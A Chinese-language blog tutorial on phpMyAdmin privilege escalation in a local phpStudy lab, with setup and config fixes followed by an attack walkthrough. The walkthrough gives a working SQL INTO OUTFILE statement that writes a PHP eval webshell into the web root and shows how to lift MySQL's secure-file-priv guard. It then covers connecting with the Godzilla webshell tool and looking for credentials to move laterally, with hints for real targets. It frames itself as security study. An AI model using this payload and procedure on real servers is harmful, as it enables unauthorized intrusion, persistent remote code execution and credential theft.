phpMyAdmin权限提升

免责声明:本文技术仅用于网络安全学习研究,请严格遵守《网络安全法》等相关法律法规,严禁未经授权对任何网络、系统实施攻击或测试,违规操作引发的一切法律责任由使用者自行承担,作者不承担连带责任。

一、环境搭建

小皮下载phpMyAdmin,绑定好网站

网站配置

对应php版本要求5.5以上,需要使用https

下载好高版本php,去网站管理这里设置

选择https,生成开发者测试证书,会自动填充,确认之后等待apache重启

用户名和密码为绑定的网站的(实战中可通过泄露得到)

登陆进去,出现报错:配置文件现在需要一个短语密码。

在下载的phpMyAdmin目录下找到文件"config.sample.inc.php"

将文件复制,重命名为"config.inc.php"

打开找到$cfg'blowfish_secret' = '';这一行,在单引号里填入任意字符串(长一些)

保存文件后刷新页面,报错解决

警告:Undefined index: utf8

还是config.inc.php文件,在数据库配置段添加字符集定义

cfg\['Servers'\]\[i]'charset' = 'utf8';

cfg\['Servers'\]\[i]'collation_connection' = 'utf8_general_ci';

二、实操

SQL命令行写入木马文件

复制代码
SELECT '<?php eval($_POST["pass"]);?>' INTO OUTFILE 'D:\\phpstudy_pro\\WWW\\1.php'

(实战中phpMyAdmin存放目录可尝试通过报错得到,\\双写防止转义)

报错,原因是 secure-file-pive是MySQL 安全限制参数,用于禁止**SELECT ... INTO OUTFILE** 随意写入服务器文件

解决:找到小皮当前使用数据库的my.ini配置文件,在mysqld写入secure-file-priv = "",保存,重启数据库

写入成功

访问1.php文件

哥斯拉连接

连接成功

横向移动的话可以去查找该数据库下其他网站配置文件等,查找源码或登录的账号密码之类的。

相关推荐
菩提小狗2 小时前
每日安全情报报告 · 2026-10-09
网络安全·漏洞·cve·安全情报·每日安全
白帽攻防录3 小时前
SRC 挖洞:TanStack Start 服务器函数 XSS 深度复盘,CVE-2026-102989 怎么窃取用户会话
运维·服务器·网络安全·xss
三8443 小时前
Fastjson 漏洞· 06 · 防御、审计与检测
安全·web安全·fastjson
中原第一高手3 小时前
fofatoto 1.8.0 发布:启动即知新版本、中文进度面板与更干净的 Web 日志
python·网络安全·开源·资产测绘·fofa
砚凝霜4 小时前
【软考信息安全】第十二章 网络安全审计概述与分类
网络·安全·web安全
Bruce_Liuxiaowei4 小时前
2026年10月第2周网络安全形势周报
网络安全
梦帮科技17 小时前
【3.0修订版】跨链中继与事件编排:Relayer 监听、多签验证与故障自愈
web安全·金融·区块链·密码学·智能合约·安全架构·信任链
黄金龙PLUS18 小时前
如何基于置换算法来设计对称加密算法
算法·网络安全·密码学·哈希算法·同态加密
王大傻092820 小时前
堆叠注入(Stacked Queries Injection)详解:原理、利用与防御
服务器·网络·数据库·web安全·网络安全
芯盾时代1 天前
从《人工智能安全治理框架3.0》看智能体安全治理
人工智能·安全·网络安全·智能体